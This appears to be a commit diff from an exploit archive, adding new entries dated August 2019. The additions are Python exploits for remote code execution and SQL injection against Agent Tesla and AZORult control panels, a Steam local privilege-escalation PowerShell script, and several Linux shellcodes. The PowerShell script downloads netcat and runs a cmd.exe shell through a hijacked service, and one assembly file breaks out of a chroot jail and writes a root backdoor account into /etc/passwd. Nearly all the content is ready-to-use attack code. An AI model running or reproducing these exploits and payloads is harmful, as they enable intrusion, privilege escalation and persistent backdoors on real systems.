DB: 2019-08-14

6 changes to exploits/shellcodes

Steam Windows Client - Local Privilege Escalation
Agent Tesla Botnet - Arbitrary Code Execution
AZORult Botnet - SQL Injection

Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)
Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode
Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode

exploits/php/remote/47243.py

@@ -0,0 +1,54 @@
+import requests
+import argparse
+import base64
+
+# Agent Tesla C2 RCE by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+
+def get_args():
+	parser = argparse.ArgumentParser(
+		prog="agent_tesla_sploit.py",
+		formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+		epilog= '''
+		This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
+		''')
+	parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
+	parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+	parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+	args = parser.parse_args()
+	return args
+
+def pwn_target(target, command, proxy):
+	requests.packages.urllib3.disable_warnings()
+	proxies = {'http': proxy, 'https': proxy}
+	print('[*] Probing...')
+	get_params = {
+		'table':'screens', 
+		'primary':'HWID', 
+		'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}', 
+		'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
+	}
+	target = target + '/server_side/scripts/server_processing.php'
+	try:
+		r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+		print("[*] Your IP: {}".format(r.text))
+		headers = {
+			"User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+		}
+		r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
+		result = r.json()['data'][-1]['HWID']
+		print('[+] {}'.format(result))
+	except:
+		print("[-] ERROR: Something went wrong.")
+		print(r.text)
+		raise
+
+def main():
+	print ()
+	print ('Agent Tesla RCE by prsecurity.')
+	args = get_args()
+	pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+	main()

exploits/php/remote/47244.py

@@ -0,0 +1,95 @@
+import requests
+import argparse
+import base64
+
+# Azorult 3.3.1 C2 SQLi by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+# change GUID and XOR key to specific beacon, can be extracted from a sample
+
+guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
+key = "\x03\x55\xae"
+
+def get_args():
+	parser = argparse.ArgumentParser(
+		prog="azorult_sploit.py",
+		formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+		epilog= '''
+		This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
+		''')
+	parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
+	parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
+	parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+	args = parser.parse_args()
+	return args
+
+def CB_XORm(data, key):
+    j=0
+    key = list(key)
+    data = list(data)
+    tmp = list()
+    for i in range(len(data)):
+        tmp.append(chr(ord(data[i])^ord(key[j])))
+        j += 1
+        if j > (len(key)-1):
+            j = 0
+    return "".join(tmp)
+
+def pwn_target(target, num_records, proxy):
+	requests.packages.urllib3.disable_warnings()
+	proxies = {'http': proxy, 'https': proxy}
+	
+	try:
+		r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+		print("[*] Your IP: {}".format(r.text))
+		headers = {
+			"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+		}
+		print('[+] Getting URL, LOGIN AND PASS')
+		data = [
+		    "|".join([
+		        "1","2","3","4","5","6","7","8","9","10","11","12"
+		    ]),
+		    "\r\n".join([
+		        "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
+		    ]),
+		    "c",
+		    "d",
+		    ":".join(["'11","22"])
+		]
+		payload = CB_XORm(guid.join(data), key)
+		r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+		if r.text != "OK":
+			print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+			raise
+		print('[+] Getting LOGIN/PASS')
+		data = [
+		    "|".join([
+		        "1","2","3","4","5","6","7","8","9","10","11","12"
+		    ]),
+		    "\r\n".join([
+		        "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
+		    ]),
+		    "c",
+		    "d",
+		    ":".join(["'11","22"])
+		]
+		payload = CB_XORm(guid.join(data), key)
+		r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+		if r.text != "OK":
+			print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+			raise
+		print('[+] If this worked, you will see two new records in password table at guest.php')
+	except:
+		print("[-] ERROR: Something went wrong.")
+		print(r.text)
+		raise
+
+def main():
+	print ()
+	print ('Azorult 3.3.1 SQLi by prsecurity')
+	args = get_args()
+	pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+	main()

exploits/windows/local/47238.ps1

@@ -0,0 +1,30 @@
+$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
+$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" 
+$RegDir = "C:\Windows\Temp\RegLN.exe"
+$PayDir = "C:\Windows\Temp\payload.exe"
+$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
+$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
+$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
+$WebClient = New-Object System.Net.WebClient
+
+
+If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
+{
+$WebClient.DownloadFile($PayDownload, $PayDir)
+$WebClient.DownloadFile($RegDownload, $RegDir)
+}
+
+If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
+{
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}
+Else
+{
+Remove-Item -Path $SteamRegKey -Recurse
+Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}

files_exploits.csv

@@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
+47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
 47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
 47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
+47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
+47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

files_shellcodes.csv

@@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
 47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
+47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86

shellcodes/linux/47239.c

@@ -0,0 +1,49 @@
+/* Alpha (AXP) Linux/Tru64 execve() shellcode
+*  ==========================================
+* This shellcode uses the stack to store a generated
+* "callsys" instruction, due to this it needs executable
+* stack. To test on Linux use "execstack -s <bin>" and
+* on Tru64 use "sysconfig -r proc executable_stack=1".
+* 
+* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
+*
+* -- Hacker Fantastic (https://hacker.house)
+*/
+#include <stdio.h>
+#include <stdlib.h>
+
+unsigned char shellcode[] = {
+	"\x80\xff\xde\x23"   /* lda $sp,-128($sp)   */
+	"\x73\x68\x3f\x24"   /* ldil $1, 0x68732f2f */
+	"\x2f\x2f\x21\x20"   /* sll $1, 0x20        */
+	"\x21\x17\x24\x48"   /* ldil $2, 0x6e69622f */
+	"\x69\x6e\x5f\x24"   /* addq $1, $2, $1     */
+	"\x2f\x62\x42\x20"   /* stq $31, -32($sp)   */
+	"\x01\x04\x22\x40"   /* stq $31, -24($sp)   */
+	"\xe0\xff\xfe\xb7"   /* stq $31, -8($sp)    */
+	"\xe8\xff\xfe\xb7"   /* stq $1, -16($sp)    */
+	"\xf8\xff\xfe\xb7"   /* mov $sp, $16        */
+	"\xf0\xff\x3e\xb4"   /* subq $16, 0x10, $16 */
+	"\x10\x04\xfe\x47"   /* stq $16, -40($sp)   */
+	"\x30\x15\x02\x42"   /* mov $sp, $17        */
+	"\xd8\xff\x1e\xb6"   /* subq $17, 0x28, $17 */
+	"\x11\x04\xfe\x47"   /* mov $sp, $18        */
+	"\x31\x15\x25\x42"   /* subq $18, 0x18, $18 */
+	"\x12\x04\xfe\x47"   /* ldil $0, 0xffffff3c */
+	"\x32\x15\x43\x42"   /* ldil $1, 0xffffff01 */
+	"\x3c\xff\x1f\x20"   /* subq $0, $1, $0     */
+	"\x01\xff\x3f\x20"   /* ldil $1, 0xffffff84 */
+	"\x20\x05\x01\x40"   /* ldil $2, 0xffffff01 */
+	"\x84\xff\x3f\x20"   /* subq $1, $2, $1     */
+	"\x01\xff\x5f\x20"   /* stl $1, -48($sp)    */
+	"\x21\x05\x22\x40"   /* subq $sp, 0x30, $sp */
+	"\xd0\xff\x3e\xb0"   /* jmp $sp,($sp),0xff10 */
+	"\x3e\x15\xc6\x43"
+	"\xc4\x3f\xde\x6b"
+};
+
+int main(){
+	int (*func)();
+        func = (int (*)())shellcode;
+        func();
+}

shellcodes/linux_x86/47240.S

@@ -0,0 +1,67 @@
+# tolower() execve() /bin/sh -c (user supplied command)
+# shellcode to evade tolower() and friends, requires %esi
+# to reference a valid writeable address (usually does)
+.text
+	.global _start
+_start:
+        jmp data
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+        nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+	nop
+start:
+	popl    %edi
+        movl    %edi, %ecx     	       
+        xorl    %eax,%eax            
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	pushl   $0x68732f2f            
+	pushl   $0x6e69622f            
+	movl    %esp,%ebx              
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	pushw   $0x632d               
+	movl    %esp,%edi             
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %ecx,%eax
+        movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %edi,%eax
+        movl    %eax,%es:(%esi)
+ 	pushl   %es:(%esi)
+        movl    %ebx,%eax
+	movl    %eax,%es:(%esi)
+	pushl   %es:(%esi)
+	movl    %esp,%esi
+	movl    %esi,%ecx
+	xorl    %eax, %eax
+	movb    $0x08, %al           
+	addb    $0x03, %al 
+	int     $0x80                
+data:
+	call start
+    	#command
+.ascii "id"

shellcodes/linux_x86/47242.asm

@@ -0,0 +1,204 @@
+;# Description: SCORE - The ShellCORE
+;#              score is a complete shellcode for x86 processors running
+;#              linux. It is designed to help work further with an exploited
+;#              process.
+;#
+;#    Coded by: prdelka
+
+;#########################
+;#        [CORE]         #
+;#########################
+
+;--- NOP Equivalent instruction
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+     cld
+
+;--- core initialise
+     jmp $+0x06
+     pop edi
+     push edi
+     jmp edi
+     call $-0x04
+;--- core prompt
+     pop edi
+     push 0x3e0a7964
+     push 0x61655220
+     push 0x65726f43
+     xor eax,eax
+     mov al,0x4
+     xor ebx,ebx
+     mov bl,0x1
+     mov ecx,esp
+     xor edx,edx
+     mov dl,0xc
+     int 0x80
+;--- core read choice
+     xor eax,eax
+     mov ebp,esp
+     push eax
+     mov al,0x3
+     xor ebx,ebx
+     mov bl,0x1
+     mov ecx,ebp
+     xor edx,edx
+     mov dl,0x2
+     int 0x80
+;--- core module selector
+     mov edx,ebp
+
+;### [backdoor module] 'b'
+     cmp word[edx],0x0a62
+     je $+0x5e
+;### [break-chroot-jail module] 'j'
+     cmp word[edx],0x0a6a
+     je $+0x59
+;### [privilege restore module] 'p'
+     cmp word[edx],0x0a70
+     je $+0x37
+;### [shellcode module] 's'
+     cmp word[edx],0x0a73
+     je $+0x14
+;### [exit module] 'x'
+     cmp word[edx],0x0a78
+     je $+0x05
+;--- core loop
+     push edi
+     jmp edi
+
+;#########################
+;#       [MODULES]       #
+;#########################
+
+;--- [exit module]
+     xor eax,eax
+     mov al,0x1
+     xor ebx,ebx
+     int 0x80
+
+;--- [shellcode module]
+     xor eax,eax
+     push eax
+     push 0x68732f2f
+     push 0x6e69622f
+     mov ebx,esp
+     push eax
+     mov edx,esp
+     push ebx
+     mov ecx,esp
+     mov al,0xB
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;--- [privilege restore module]
+     xor eax,eax
+     mov ah,0x17
+     shr eax,0x8
+     xor ebx,ebx
+     int 0x80
+     xor eax,eax
+     mov ah,0x2e
+     shr eax,0x8
+     xor ebx,ebx
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;### [LONG backdoor module jump]
+     jmp $+0x46
+
+;--- [break-chroot-jail]
+     xor eax,eax
+     push eax
+     push 0x6c69616a
+     mov ebx,esp
+     mov edx,esp
+     mov cx,0x2F3
+     mov al,0x27
+     int 0x80
+     xor eax,eax
+     push eax
+     mov ebx,edx
+     mov al,0x3d
+     int 0x80              
+     push 0x2e2e2e2e
+     mov ebx,esp
+     add bl,0x2
+     mov edx,ebx
+     xor ecx,ecx
+     mov cl,0xff
+     mov al,0x0c 
+     mov ebx,edx
+     int 0x80          
+     loop $-0x06             
+     mov ebx,edx
+     add bl,0x1
+     mov al,0x3d
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi
+
+;--- [backdoor module]
+     xor eax,eax
+     push eax
+     push 0x64777373
+     push 0x61702f2f
+     push 0x6374652f
+     mov esi,esp
+     xor edx,edx
+     xor ecx,ecx
+     mov cl,0x01
+     mov ebx,esi
+     xor eax,eax
+     mov al,0x5
+     int 0x80
+     push eax
+     mov esi,esp
+     xor eax,eax
+     mov al,0x13
+     mov ebx,[esi]
+     xor ecx,ecx
+     xor edx,edx
+     mov dl,0x2
+     int 0x80
+     xor eax,eax
+     mov al,0x4
+     mov ebx,[esi]
+     xor ecx,ecx
+     push ecx
+     push 0x0a687361
+     push 0x622f6e69
+     push 0x622f3a74
+     push 0x6f6f722f
+     push 0x3a676663
+     push 0x20726f66
+     push 0x20726573
+     push 0x75206d65
+     push 0x74737973
+     push 0x3a303a30
+     push 0x3a3a6766
+     push 0x63737973
+     mov ecx,esp
+     xor edx,edx
+     mov dl,0x30
+     int 0x80
+     xor eax,eax
+     mov al,0x6
+     mov ebx,[esi]
+     int 0x80
+;### [core loop]
+     push edi
+     jmp edi